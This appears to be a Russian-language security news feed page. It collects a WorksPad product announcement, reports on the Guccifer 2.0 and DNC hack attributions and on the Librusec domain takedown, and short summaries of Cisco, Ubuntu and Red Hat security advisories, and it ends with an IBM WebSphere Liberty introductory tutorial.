В каждой из своих ключевых функций – работа с файловыми ресурсами и источниками документов, корпоративная почта и календари, доступ к контактам и адресной книге предприятия, а теперь и доступ к сайтам в интернет и интранет – WorksPad обеспечивает широкий спектр возможностей, зачастую отсутствующий в специализированных приложениях в каждой из этих областей.

Глубоко интегрированные между собой в рамках одного приложения, все эти функции позволяют мобильному пользователю работать не только безопасно, но и привычно – максимально приближено к повседневным сценариям работы на ПК.

WorksPad с самого начала разрабатывается с учетом современных требований информационной безопасности. По данным компании InfoWatch, количество утечек конфиденциальной информации через электронную почту за год выросло с 7% до 16%, в случае с внутренними нарушениями значительная часть утечек происходит с использованием бесплатных почтовых аккаунтов (веб-почта). А на первый план (65%) как по количеству утечек, так и по объему скомпрометированных данных выходит сетевой канал (браузер и облако).

Фонд Сколково оказал поддержку в разработке функциональности браузера в составе WorksPad, предоставив мини-грант на стадии бета-версии. «МобилитиЛаб» получил это право как победитель Web&Tech Ready.

Новая версия WorksPad 3.0, включающая серверную инфраструктуру и клиентские приложения для Android и iOS, станет доступна заказчикам и партнерам в октябре 2016 года.

Сергей Орлик, генеральный директор «МобилитиЛаб»:

«WorksPad 3.0 – важный шаг в развитии нашего продукта. WorksPad создается российскими разработчиками с ясной и амбициозной  целью: быть лучшим на рынке в своем классе и в России, и в мире, задавая планку того, что такое корпоративное мобильное рабочее место не просто в названии, а по сути предоставляемых пользователям возможностей. Предназначенный для работы с неструктурированной информацией: почтой, документами, календарями и т.п., WorksPad обеспечивает уровень безопасности, позволяющий полноценно использовать мобильные устройства сотрудников в модели BYOD, которая де-факто определяет сегодняшний уровень мобилизации бизнеса. Благодаря постоянному развитию возможностей и функционала WorksPad  находит новых корпоративных пользователей, число которых в этом году уже перешагнуло за 10 000».

orig: 2016-09-29 06:26:37 / https://www.anti-malware.ru/news/2016-09-29/21078 (click post title)

Целью России может являться дискредитация политических партий и ведомств правительства США.

Американские власти уверены, что хакер Guccifer 2.0 является частью синдиката, используемого РФ для маскировки своей причастности к ряду кибератак, в частности, взлому серверов Национального комитета Демократической партии и ее организаций. Об этом пишет издание The Wall Street Journal со ссылкой на осведомленные источники.

Хотя Guccifer 2.0 отрицает связь с российским правительством, американские чиновники и независимые эксперты в области информационной безопасности говорят об усилении кампании со стороны России, направленной на известных американских спортсменов, членов партий и военных чиновников.

По мнению властей США, по крайней мере две связанные с правительством РФ группировки (Fancy Bear и Cozy Bear) причастны к хищению больших объемов данных, которые затем были опубликованы на трех ресурсах - WikiLeaks, DCLeaks.com и в блоге Guccifer 2.0. Как считают эксперты, DCLeaks.com и Guccifer 2.0 часто сотрудничают между собой и имеют непосредственную связь с российскими хакерами.

Согласно мнению ряда аналитиков, целью России может являться дискредитация политических партий и ведомств правительства США.

Ранее Демократическая партия США обвинила Россию в попытке повлиять на президентские выборы и призвала Владимира Путина «отдать приказ о прекращении подобных действий». В свою очередь, Путин заявил, что РФ не имеет отношения ко взлому серверов Демпартии и последующей публикации похищенных данных.

orig: 2016-09-29 06:07:22 / http://www.securitylab.ru/news/483968.php (click post title)

Американская сторона не спешит принимать помощь России.

Одним из наиболее обсуждаемых инцидентов безопасности за последнее время является атака на Демократическую партию США и публикация ее документов. По мнению американских властей, ответственность за взлом лежит на хакерах, работающих на правительство РФ. Как сообщает издание «Комсомольская Правда» со ссылкой на официального представителя МИД РФ Марию Захарову, Россия предлагала ФБР свою помощь в расследовании инцидента, однако ответа так и не получила.

По словам Захаровой, в России хакеры находятся вне закона, поэтому государство заинтересовано в проведении надлежащего расследования. Как отметила представитель МИД РФ, правительство хочет, чтобы ФБР делилось информацией о проводимом следствии. Со своей стороны Россия также готова предоставлять спецслужбе запрашиваемые ею данные.  

orig: 2016-09-29 05:43:16 / http://www.securitylab.ru/news/483967.php (click post title)

Домен будет разделегирован до конца года.

Домен популярной online-библиотеки «Либрусек» (lib.rus.ec) будет выключен. Решение о разделегировании домена rus.ec, частью которого является lib.rus.ec, вынес Эквадорский институт интеллектуальной собственности по заявлению Ассоциации защиты авторских прав в интернете (АЗАПИ), сообщают «Известия».

По словам главы ассоциации Максима Рябыко, в настоящее время проводятся формальные процедуры, которые будут завершены в течение трех месяцев. До конца года домен будет разделегирован.

Сейчас правоохранительные органы ведут расследование деятельности сайта «Либрусек». Нынешним летом следственный отдел ОВД Якиманка возбудил уголовное дело по ч.3 ст. 146 УК РФ (нарушение авторских и смежных прав). Следователи изучают возможные связи между библиотекой «Либрусек», сайтом «Аймобилко» и компанией «Универсальные книжные технологии». Правоохранители уже изъяли у хостинг-провайдера ООО «Теленэт» все серверы, находящиеся во владении компании «Универсальные книжные технологии». Сайты «Либрусек» и «Аймобилко» перестали работать после изъятия серверов.

Напомним, 8 августа нынешнего года Мосгорсуд вынес постановление о блокировке доступа к ресурсу «Либрусек» на постоянной основе.

orig: 2016-09-29 04:46:44 / http://www.securitylab.ru/news/483966.php (click post title)

Revive Adserver versions 3.2.4 and below suffers from reflected file download, cross site scripting, and special element injection.

orig: 2016-09-29 04:30:33 / https://packetstormsecurity.com/files/138905/REVIVE-SA-2016-002.txt (click post title)

Cisco Security Advisory - The Smart Install client feature in Cisco IOS and IOS XE Software contains a vulnerability that could allow an unauthenticated, remote attacker to cause a memory leak and eventual denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect handling of image list parameters. An attacker could exploit this vulnerability by sending crafted Smart Install packets to TCP port 4786. A successful exploit could cause a Cisco Catalyst switch to leak memory and eventually reload, resulting in a DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability other than disabling Smart Install functionality on the affected device.

orig: 2016-09-29 04:29:48 / https://packetstormsecurity.com/files/138904/cisco-sa-20160928-smi.txt (click post title)

Cisco Security Advisory - Multiple vulnerabilities in the multicast subsystem of Cisco IOS and IOS XE Software could allow an unauthenticated, remote attacker to create a denial of service (DoS) condition. The issues are in IPv4 Multicast Source Discovery Protocol (MSDP) and IPv6 Protocol Independent Multicast (PIM). The first vulnerability (Cisco bug ID CSCud36767) is due to insufficient checking of MSDP Source-Active (SA) messages received from a configured MSDP peer. An attacker who can send traffic to the IPv4 address of a device could exploit this vulnerability by sending a packet designed to trigger the issue to the affected device. A successful exploit could cause the affected device to restart. The second vulnerability (Cisco bug ID CSCuy16399) is due to insufficient checking of packets encapsulated in a PIM register message. An attacker who can send a malformed IPv6 PIM register packet to a PIM rendezvous point (RP) could exploit the vulnerability. A successful exploit could cause the affected device to restart. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.

orig: 2016-09-29 04:29:30 / https://packetstormsecurity.com/files/138903/cisco-sa-20160928-msdp.txt (click post title)

Cisco Security Advisory - A vulnerability in the Internet Key Exchange version 1 (IKEv1) fragmentation code of Cisco IOS and IOS XE Software could allow an unauthenticated, remote attacker to cause an exhaustion of available memory or a reload of the affected system. The vulnerability is due to the improper handling of crafted, fragmented IKEv1 packets. An attacker could exploit this vulnerability by sending crafted UDP packets to the affected system. An exploit could allow the attacker to cause a reload of the affected system. Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability can be triggered by IPv4 and IPv6 traffic. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

orig: 2016-09-29 04:29:16 / https://packetstormsecurity.com/files/138902/cisco-sa-20160928-ios-ikev1.txt (click post title)

Cisco Security Advisory - A vulnerability in the implementation of Network Address Translation (NAT) functionality in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload. The vulnerability is due to improper handling of malformed ICMP packets by the affected software. An attacker could exploit this vulnerability by sending crafted ICMP packets that require NAT processing by an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

orig: 2016-09-29 04:28:56 / https://packetstormsecurity.com/files/138901/cisco-sa-20160928-esp-nat.txt (click post title)

Cisco Security Advisory - A vulnerability in the Common Industrial Protocol (CIP) feature of Cisco IOS Software could allow an unauthenticated, remote attacker to create a denial of service (DoS) condition. The vulnerability is due to a failure to properly process an unusual, but valid, set of requests to an affected device. An attacker could exploit this vulnerability by submitting a CIP message request designed to trigger the vulnerability to an affected device. An exploit could cause the switch to stop processing traffic, requiring a restart of the device to regain functionality. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

orig: 2016-09-29 04:28:39 / https://packetstormsecurity.com/files/138900/cisco-sa-20160928-cip.txt (click post title)

Cisco Security Advisory - A vulnerability in the Authentication, Authorization, and Accounting (AAA) service for remote Secure Shell Host (SSH) connections to the device for Cisco IOS and IOS XE Software could allow an unauthenticated, remote attacker to cause the vulnerable device to reload. The vulnerability is due to an error log message when a remote SSH connection to the device fails AAA authentication. An attacker could exploit this vulnerability by attempting to authenticate to the targeted device. An exploit could allow the attacker to cause a denial of service (DoS) condition. Cisco has released software updates that address this vulnerability. There is a workaround that addresses this vulnerability.

orig: 2016-09-29 04:28:14 / https://packetstormsecurity.com/files/138899/cisco-sa-20160928-aaados.txt (click post title)

Ubuntu Security Notice 3092-1 - Stefan Metzmacher discovered that Samba incorrectly handled certain flags in SMB2/3 client connections. A remote attacker could use this issue to disable client signing and impersonate servers by performing a man in the middle attack. Samba has been updated to 4.3.11 in Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. In addition to the security fix, the updated packages contain bug fixes, new features, and possibly incompatible changes. Various other issues were also addressed.

orig: 2016-09-29 04:25:58 / https://packetstormsecurity.com/files/138898/USN-3092-1.txt (click post title)

Red Hat Security Advisory 2016-1969-01 - This release of Red Hat JBoss BPM Suite 6.3.3 serves as a replacement for Red Hat JBoss BPM Suite 6.3.2, and includes bug fixes and enhancements, which are documented in the Release Notes of the patch linked to in the References section. Security Fix: A security flaw was found in the way Business Process Editor displays the business process details to the user. A remote, authenticated attacker with privilege to create business processes could use this flaw to conduct stored XSS attacks against other users.

orig: 2016-09-29 04:25:50 / https://packetstormsecurity.com/files/138897/RHSA-2016-1969-01.txt (click post title)

Red Hat Security Advisory 2016-1968-01 - This release of Red Hat JBoss BRMS 6.3.3 serves as a replacement for Red Hat JBoss BRMS 6.3.2, and includes bug fixes and enhancements, which are documented in the Release Notes of the patch linked to in the References section. Security Fix: A security flaw was found in the way Business Process Editor displays the business process details to the user. A remote, authenticated attacker with privilege to create business processes could use this flaw to conduct stored XSS attacks against other users.

orig: 2016-09-29 04:25:25 / https://packetstormsecurity.com/files/138896/RHSA-2016-1968-01.txt (click post title)

Ubuntu Security Notice 3093-1 - It was discovered that ClamAV incorrectly handled certain malformed files. A remote attacker could use this issue to cause ClamAV to crash, resulting in a denial of service, or possibly execute arbitrary code. In the default installation, attackers would be isolated by the ClamAV AppArmor profile.

orig: 2016-09-29 04:25:18 / https://packetstormsecurity.com/files/138895/USN-3093-1.txt (click post title)

Введение

Знакомо ли вам такое: У вас есть опыт работы с традиционными серверами приложений Java EE, которые использует ваша компания (такими, как классические серверы IBM WebSphere Application Server, WebLogic, JBoss и т.д.), и вот руководство компании принимает решение о переходе на облачную инфраструктуру. При этом версии ваших платформ, предназначенные для разработки приложений, предоставляемых как услуга, выглядят похоже, но все же не совсем так, как привычные для вас платформы, а облачные модели настолько динамичны, что вводят вас в замешательство: какие сборки использовать? какие функции будут работать, а какие – нет? Более того, даже с названиями нет полной ясности: например, это профиль или сервер?).

Если темпы освоения облачных технологий приводят вас в расстройство, знайте: помощь уже здесь. Вы как раз смотрите на нее.

Это первое из трех обучающих пособий, призванных повысить темпы освоения благодаря быстрому знакомству с информацией, которая может очень пригодиться вам в процессе перехода от традиционного сервера WebSphere Application Server к WebSphere Liberty и в конечном итоге к IBM Bluemix. Кое-что из написанного ниже вам уже может быть известно (просто пропустите эти разделы). В остальных разделах предлагаемых обучающих пособий рассказывается о том, что представляет собой WebSphere Liberty, как установить среду разработки приложений Liberty и как выполнять развертывание этих приложений на сервере Bluemix.

Что такое Liberty? IBM WebSphere Liberty – это архитектура следующего поколения для сервера приложений IBM WebSphere Application Server. Профиль Liberty позволяет создавать более эффективный исполняющий код приложений Java EE, однако, чтобы добиться этого, необходимо понимать, каким образом следует настроить параметры нового исполняющего кода и как оптимизировать его в соответствии с вашими потребностями. Эта статья содержит вводную информацию об архитектуре Liberty, объясняет ее понятия, описывает ее преимущества и отличия от более старых архитектур серверов приложений. Кроме того, она описывает новые типы задач, которым вам потребуется выполнить, чтобы адаптировать Liberty в соответствии с вашими требованиями. Приведенная здесь информация поможет вам понять преимущества профиля Liberty и познакомиться со способами разработки приложений на основе Liberty.

Эта группа обучающих пособий включает в себя:

Первые два пособия будут полезны всем разработчикам Liberty, третье пособие адресовано только тем разработчикам, которые используют Bluemix.

В начало

Если в двух словах, WebSphere Liberty обладает усовершенствованной архитектурой, которая обладает целым рядом преимуществ по сравнению с другими, более старыми серверами приложений Java EE. К числу таких преимуществ относятся:

• Архитектура на базе ядра – Архитектура на базе ядра подразумевает, что изначально размер исполняющего кода крайне мал, и сам код выполняется очень быстро, а затем его размер постепенно увеличивается по мере необходимости. Как правило, сервер Liberty занимает примерно 50 Мбайт в оперативной памяти и запускается менее, чем за 3 секунды.
• Диспетчер функциональных групп – Сервер приложений реализован в виде совокупности функциональных групп, которые диспетчер подгружает только по мере необходимости, это позволяет поддерживать размер сервера на минимально возможном уровне.
• Репозиторий WebSphere Liberty – Функциональные группы подгружаются по мере необходимости непосредственно с сайта IBM.
• Динамические обновления – Установка новых функциональных групп не требует перезапуска сервера.
• Поддержка Java EE 7 – Liberty поддерживает полноценные приложения Java EE 7 .
• Простота установки – Чтобы установить исполняющий код, достаточно просто распаковать файл архива. Полный размер скачиваемого дистрибутива Java EE 7 составляет всего 94 Мбайт (без учета JRE).
• Простота развертывания – Приложение достаточно поместить в нужный каталог, и сервер его запустит.
• Простота настройки – Для настройки основных параметров каждого сервера используется один простой XML-файл.
• Высокая масштабируемость – Модель администрирования поддерживает работу с тысячами серверов. Число участников кластера может исчисляться сотнями.
• Упаковка сервера – Система позволяет создавать компактные архивы приложений, которые включают в себя настройки серверов для удобства развертывания в промышленной инфраструктуре.

Преимущества Liberty открывают широкие возможности для использования промышленных приложений Java в различных сценариях:

• Постоянные обновления – IBM выпускает новые версии каждой функциональной группы по отдельности.
• Среда разработки – Благодаря простоте установки, настройки и обновления два и более тестовых серверов Liberty можно легко запускать на одном компьютере параллельно с другими приложениями.
• Компьютеры с одной платой – Приложения Liberty могут работать на микрокомпьютерах нового поколения, таких, как Raspberry Pi.
• Интернет устройств – Приложения могут работать на небольших, распределенных устройствах (таких, как компьютеры с одной платой).
• Каждое приложение обслуживает свой сервер – Возможность развертывания каждого приложения на собственном сервере обеспечивает более высокую изоляцию и управляемости, практически не добавляя непроизводительных издержек.
• Микрослужбы – Каждый экземпляр каждой микрослужбы можно запускать на собственном сервере.
• Контейнеры – Полноценный сервер приложений можно запускать в небольшом, легком контейнере.
• Облако – Большое количество серверов может быстро, легко и эффективно работать на виртуализированных аппаратных ресурсах.
• Эластичность – Масштабирование кластеров осуществляется автоматически: число участников кластера увеличивается или уменьшается в зависимости от уровня нагрузки.
• Высочайшая производительность – Топологии могут обрабатывать миллиарды вызовов API в сутки.

Способен ли на такое ваш сервер приложений? А вот сервер Liberty способен!

В разделах, приведенных ниже, описываются основные понятия и термины, которые помогают лучше понять, как работает профиль Liberty, и в чем состоит его отличие от других серверов приложений.

В начало

WebSphere Application Server состоит из двух сред выполнения сервера приложений, которые называют профилями:

• Полный профиль (иногда его называют "классическим" сервером приложений WebSphere Application Server) – Исходная архитектура WebSphere Application Server, начало которой было положено в 1998 году с появлением Servlet Express v1.0 и которая в итоге превратилась в контейнер Java EE промышленного уровня.
• Профиль Liberty – Архитектура контейнеров Java EE следующего поколения, появившаяся в WebSphere Application Server v8.5.0 в 2013 году, отличается высокой степенью компонуемости, обеспечивает быстрый запуск сервера, потребляет меньший объем памяти и лучше масштабируется.

Какой из серверов WebSphere Application Server вам знаком: В случае использования ячейки сетевого развертывания WebSphere Application Server, каждый участник кластера функционирует как экземпляр полного профиля. Невзирая на то, что Liberty является частью продукта WebSphere Application Server, у вас не было возможности использовать ее функциональность.

Как будет видно ниже, исполняющий код Liberty отличается высокой компактностью и небольшим размером, благодаря чему он особенно хорошо подходит для виртуализированных инфраструктур и облачных вычислений, для легких контейнеров и устройств, объединенных Интернетом устройств.

Liberty поставляется в виде компонента, входящего в различные платформы. На момент написания данного документа существуют следующие варианты поставки Liberty:

• Профиль Liberty – Компонент сервера WebSphere Application Server, который доступен и по отдельности, для установки на компьютере заказчика; допускает возможность установки на ноутбуке или настольном компьютере в целях разработки.
• Образы Liberty Docker – Образы websphere-liberty которые используют Liberty в контейнерах Docker.
• Мгновенный исполняющий код Bluemix – Исполняющий код Liberty for Java в Bluemix, встроенный с использованием IBM WebSphere Application Server Liberty Buildpack for Cloud Foundry.
• Контейнер Bluemix – Образ IBM Liberty (ibmliberty), образ websphere-liberty, который оптимизирован для выполнения на сервере Bluemix.

Для любой определенной версии Liberty (например, v8.5.5.6) каждый из перечисленных выше вариантов дистрибутивов предоставляет примерно одинаковую функциональность. Основное отличие состоит в том, что пакет сборок (buildpack) не включает функциональные группы Liberty, не используемые в облачной инфраструктуре.

В начало

Сервер Liberty – это сервер приложений, который позволяет выполнять приложения Java, как правило, приложения, написанные в соответствии со спецификациями Java Enterprise Edition. В Liberty сервер обычно настраивают в виде реализации Java EE-совместимого контейнера, например, Java EE 7.

Профиль Liberty – это среда времени выполнения сервера приложений, которую устанавливают в локальной файловой системе компьютера. Профиль сам по себе не запускается, но он может выступать в качестве среды для выполнения одного или нескольких серверов.

Профиль Liberty имеет номер версии, например, v8.5.5.6 (это номер версии ядра Liberty). Все серверы, функционирующие в пределах данного профиля, имеют одинаковый номер версии. В силу того, что в данном профиле может вы полняться два и более серверов, и настройка каждого сервера может осуществляться в индивидуальном порядке, нет особого смысла устанавливать несколько профилей одинаковой версии на одном и том же компьютере. Напротив, для запуска двух серверов различных версий потребуется установить два отдельных профиля, по одному для каждой версии, и создать собственный сервер в каждом профиле.

Один сервер Liberty поддерживает выполнение двух и более приложений, при этом Liberty может легко запускать каждое приложение или каждую микрослужбу на отдельном сервере. Для многих серверов приложений Java EE, таких, как полный профиль WebSphere Application Server, хорошей практикой считается развертывание двух и более приложений на одном сервере с тем, чтобы они могли совместно использовать его ресурсы. Но сервер Liberty имеет небольшой размер и отличается высокой эффективностью, поэтому развертывание нескольких приложений на одном сервере не дает большого эффекта с точки зрения экономии ресурсов. Соответственно, каждое приложение часто разворачивают на отдельном сервере для повышения уровня изоляции и управляемости. В архитектуре микрослужб каждый экземпляр каждой микрослужбы (части приложения) разворачивают на отдельном сервере.

В начало

Профиль Liberty реализует собственную функциональность в виде пакетов OSGi, при этом одну функциональную группу реализует набор связанных пакетов. Функциональная группа в Liberty реализует набор функций, доступных для использования как приложению, так и другим функциональным группам. Каждый пакет включает в себя набор JAR-файлов, которые добавляются к пути классов сервера.

Большинство функциональных групп реализуют спецификации, которые обеспечивают доступность этих технологий для приложений. Многие функциональные группы реализуют запросы JSR (Java Specification Requests, запросы на спецификацию Java), которые включают в себя платформы Java EE. Например, существуют функциональные группы Liberty для Enterprise JavaBeans (EJB), Java API для RESTful Web Services (JAX-RS), Java Database Connectivity (JDBC) и т.д. Кроме того, Liberty предлагает функциональные группы для спецификаций, выходящих за рамки Java EE, таких, как JavaScript Object Notation (JSON4J) Library, Secure Sockets Layer (SSL), Open Authentication (OAuth) и т.д.

Диспетчер функциональных групп сервера Liberty управляет набором функциональных групп, которые выполняются на сервере в настоящее время, загружая и выгружая их по мере того, как надобность в них появляется и исчезает. Диспетчер загружает только те функциональные группы, которые включены для данного сервера. Список включенных функциональных групп задается в разделе Feature manager настроек сервера Liberty. Хорошей практикой считается включение на сервере только тех функциональных групп, которые используют его приложения. Это позволяет сократить время запуска сервера и уменьшить объем потребляемой памяти.

Сервер сможет загрузить функциональную группу только при выполнении двух условий: во-первых, данная функциональная группа должна быть включена в настройках сервера, а во-вторых, соответствующий ресурс для данной функциональной группы должен быть установлен в профиле для данного сервера. Ресурс Liberty – это набор артефактов кода, который можно добавить в профиль, например, библиотека Java, которая реализует функциональность сервера. Репозиторий Liberty – это онлайн-ресурс, который содержит ресурс, доступные для загрузки профилям Liberty.

IBM WebSphere Liberty Repository – это основной репозиторий IBM для ресурсов Liberty. По умолчанию новый профиль выполняет поиск компонентов для скачивания именно в этом репозитории. Утилиты управления ресурсами в профиле осуществляют доступ к репозиторию на программном уровне.

Каждая функциональная группа содержит информацию о перечне обязательных для нее функциональных групп, от которых он зависит. При скачивании ресурса для данной функциональной группы профиль скачивает также и ресурсы для всех функциональных групп, которые входят в список обязательных для данной функциональной группы и еще не установлены в данном профиле. Аналогичным образом, при загрузке новой функциональной группы на сервер диспетчер функциональных групп также загружает все функциональные группы, которые являются для нее обязательными и еще не были загружены на данный сервер.

Некоторые функциональные группы Liberty принадлежат к числу связующих. Связующей называется определенная функциональная группа, которая служит прокси-агентом для нескольких более детализированных функциональных групп.

Например, одна функциональная группа Java EE включает все функциональные группы, составляющие платформу Java EE. Аналогичным образом, функциональная группа EJB загружает сразу несколько функциональных групп, относящихся к EJB: EJB Lite, EJB Home, EJB Remote и несколько других.

Часто при разработке приложений достаточно включить связующую функциональную группу. После того, как приложение готово к развертыванию, связующую группу можно заменить на список более детализированных функциональных групп, которые приложение реально использует. Это позволит уменьшить потребление оперативной памяти и сэкономить дисковое пространство.

В Таблице 1 приведен список связующих функциональных групп из профиля Liberty версии v8.5.5.6.

Все функциональные группы, включенные в настройках диспетчера функциональных групп, должны быть совместимы друг с другом. Две несовместимые функциональные группы нельзя загрузить на один сервер, поэтому включать их не следует. Они должны быть установлены в одном и том же профиле и загружены на разные серверы.

Например, сервер не может включить две разных версии одной и той же функциональной группы (к примеру, jaxrs-1.1 и jaxrs-2.0). Аналогичным образом, сервер не может включить webProfile-6.0 одновременно с webProfile-7.0 или с javaee-7.0. При запуске сервера, конфигурация которого предусматривает включение двух несовместимых функциональных групп, в журнале сервера появляется сообщение об ошибке CWWKF0033E error. Более подробную информацию можно найти на странице Допустимые сочетания функциональных групп Java EE 6 и 7..

В начало

Сервер Liberty представляет собой программу Java, поэтому для его выполнения необходима среда JRE (Java Runtime Environment, среда времени выполнения Java). Как будет видно ниже, большинство сборок Liberty для разработчиков не включают в себя JRE; они предполагают, что среда JRE уже установлена на целевом компьютере. Это позволяет уменьшить размер скачиваемого дистрибутива Liberty и дает возможность двум и более программам Java использовать ресурсы одной и той же среды JRE.

Среда JRE может запускать программы Java, но не может компилировать код Java. JDK или SDK (Java Development Kit или Java Software Development Kit) содержит не только исполняющий код java но и компилятор javac . Поэтому, поскольку для запуска Liberty достаточно только JRE, Liberty будет работать и в средах JDK и SDK.

В начало

Каждой версии Liberty (например, v8.5.5.6) соответствует несколько скачиваемых компонентов, представленных в списке на странице IBM WebSphere Liberty Repository: Продукт, в частности:

• WAS Liberty with Java EE 7 Full Platform
• WAS Liberty with Java EE 7 Web Profile
• WAS Liberty with Java EE 7 Web Profile with Java 8
• WAS Liberty Kernel

Что представляют собой эти скачиваемые дистрибутивы, являются ли они различными видами Liberty?

Данные скачиваемые компоненты представляют собой различные сборки одной и той же версии Liberty, предназначенные для разработки. Рисунок 1 иллюстрирует отношения между ними. (сборки также называют "установочными ZIP-архивами"; см. страницу Профиль Liberty: Список файлов с установочными ZIP-архивами.)

Каждая из представленных сборок содержит одну и ту же версию одного и того же ядра Liberty. Различие состоит в наборе функциональных групп, которые входят в состав ядра. Например, сборка WebSphere Application Server Liberty Kernel не включает в себя вообще никаких функциональных групп, поэтому размер архива составляет всего 11 Мбайт. Для сравнения размер полной платформы (94 Мбайт) превышает размер веб-профиля (63 Мбайт), поскольку полная платформа включает в себя большее число функциональных групп. Полная платформа является супермножеством по отношению к веб-профилю, а та часть полного профиля, которая является веб-профилем, в точности соответствует отдельному скачиваемому дистрибутиву веб-профиля. Таким образом, при выборе скачиваемого дистрибутива следует исходить из того, какие функциональные группы вам нужны.

Обратите внимание, что две из перечисленных сборок соответствуют связующим функциональным группам, как показано в Таблице 2.

Таблица 2 говорит нам о том, что если вам нужен сервер для запуска приложений, разработанных для определенной платформы Java EE, вам следует установить сборку, которая соответствует связующей группе функций для данной платформы. Серверы, выполняющиеся в данном профиле, будут включать в себя функциональные группы Java EE, которые необходимы приложениям.

Каждая из представленных сборок требует отдельной установки среды JRE. Исключение составляет сборка WebSphere Application Server Liberty with Java EE 7 Web Profile with Java 8, которая включает в себя не только веб-профиль, но и среду JRE (а именно – IBM Java SDK). Архив включает в себя SDK и потому имеет существенно больший размер: 198 Мбайт по сравнению с 63 Мбайт у веб-профиля без SDK. Если на вашем компьютере уже установлена свежая версия JRE (или JDK/SDK), то этот архив вам не нужен. Реализации JRE привязаны к конкретной платформе, поэтому это единственная сборка Liberty с опциями, различающимися для разных платформ.

Данные сборки Liberty дл разработчиков не являются полнофункциональным продуктом WebSphere Application Server. Полнофункциональный продукт включает в себя и полный профиль, и профиль Liberty и представляет собой семейство различных изданий продукта, в том числе версий Express, Base, Network Deployment и z/OS. Сборки Liberty для разработчиков эквивалентны компоненту профиля Liberty, являющегося частью издания WebSphere Application Server for Developers.

В начало

Для установки приложения, запускающего сервер Liberty, на новом компьютере (например, на промышленной среде), необязательно производить установку всего профиля Liberty и всех опциональных ресурсов. Вместо этого Liberty может запаковать сервер в архив, который содержит только приложение, сведения о конфигурации сервера и – опционально – порции исполняющего кода или весь исполняющий код целиком. Пакетированный сервер потребляет ровно столько дискового пространства и пропускной способности, сколько необходимо для передачи соответствующих артефактов.

Перед пакетированием сервера необходимо убрать все неиспользуемые функциональные группы из списка включенных функциональных групп диспетчера функциональных групп. Если в конфигурации диспетчера функциональных групп присутствует хотя бы одна связующая функциональная группа, то каждую из них нужно заменить явным списком функциональных групп, которые приложение реально использует. Исключение лишних из числа распространяемых функциональных групп позволяет уменьшить размер архива, исполняющего кода и сервера, который он запускает, максимально компактным.

Существует несколько уровней содержимого, которое может попасть в архив при пакетировании сервера. Все уровни включают в себя приложения и соответствующую серверную конфигурацию. Существуют следующие уровни:

• all – Полный исполняющий код
• minify – Минимальный исполняющий код
• usr – Исполняющий код отсутствует

Минимальный исполняющий код содержит не все ресурсы, установленные в исполняющем коде, а только те, которые необходимы для функциональных групп, включенных для данного сервера. Следовательно, содержимое минимального архива зависит от конфигурации сервера.

Существует также возможность пакетировать исполняющий код без приложений:

• wlp – Только исполняющий код

Следует ли включать исполняющий код в пакетируемый сервер? Это зависит от того, присутствует ли уже на целевом компьютере, на котором планируется развернуть архив, адекватный исполняющий код. Например, чтобы включить в архив абсолютно все необходимое для запуска приложения, в него следует добавить исполняющий код (уровень all или лучше уровень minify level). Однако, в случае установки нескольких приложений на несколько серверов на целевом компьютере, включение исполняющего кода во все пакеты и его последующая многократная установка на целевом компьютере будет менее эффективным решением. Более предпочтительным будет включить исполняющий код в неминимизированном варианте в какой-то один из пакетов, поскольку он должен обеспечить поддержку сразу нескольких серверов. В качестве альтернативы можно создать пакет wlp для исполняющего кода и пакеты usr для каждого из серверов.

При распаковке пакетированного сервера или исполняющего кода на целевом компьютере следует помнить, что исполняющий код не включает в себя среду JRE, поэтому она должна быть установлена на целевом компьютере.

Как будет видно ниже, пакетированный сервер (уровень usr ) также представляет собой удобный способ развертывания приложений Java вместе с соответствующей серверной конфигурацией на платформе Bluemix.

В начало

Профиль Liberty поддерживает кластеризацию. Кластер на базе Liberty выполняет примерно те же функции, что и кластер на базе полного профиля (Full profile): осуществляет распределение пользовательской нагрузки между двумя и более серверами и выполняет аварийное переключение пользовательских сессий с одного сервера на другой. При этом реализация кластера на Liberty меньше "весит" и обладает большей масштабируемостью. Как и в случае с полным профилем, функциональная группа кластеризации в профиле Liberty является частью дистрибутива WebSphere Application Server Network Deployment (WAS ND). Обратите внимание на список Функциональные группы Liberty, функциональные группы collectiveController и clusterMember входят только в состав дистрибутивов WebSphere Application Server Network Deployment и z/OS и не входят в состав дистрибутива WebSphere Application Server Base.

В профиле Liberty административный домен называется коллективом. Коллектив в значительной мере выполняет те же функции, что и ячейка в полном профиле, однако существенно отличается от нее по реализации. Контроллер коллектива выполняет те же функции, что и диспетчер развертывания; он обеспечивает централизованное администрирование участников коллектива,в роли которых выступают серверы Liberty, входящие в коллектив.

Было сделано несколько усовершенствований:

• Участники коллектива находятся в свободной связке с контроллером.
• Сервер может выступать как в качестве контроллера, так и в качестве участника.
• Коллектив может иметь два и более активных контроллера, обеспечивающих высокую доступность функций администрирования.

Более подробную информацию можно найти на странице Знакомство с коллективами Liberty.

Серверы, принадлежащие одному коллективу, можно объединить в кластер. Приложение, выполняющееся в кластере, обладает более высокой доступностью и масштабируемостью по сравнению с приложением, выполняющимся на отдельном сервере. В рамках коллектива можно создать два и более кластеров. Сервер может быть участником только одного кластера. Более подробную информацию можно найти на странице Знакомство с кластерами Liberty.

Кластер может быть автомасштабируемым, в этом случае добавление новых участников в кластер и исключение из него существующих участников осуществляется по мере необходимости. Функциональность поддержки масштабирования добавляют на контроллерах и на участниках кластера, которые предполагается добавлять к кластеру и удалять из него. Настройка контроллера масштабирования выполняется для каждого кластера с использованием политики масштабирования . Участник масштабирования отслеживает собственную рабочую нагрузку и сообщает данные о производительности контроллеру масштабирования.

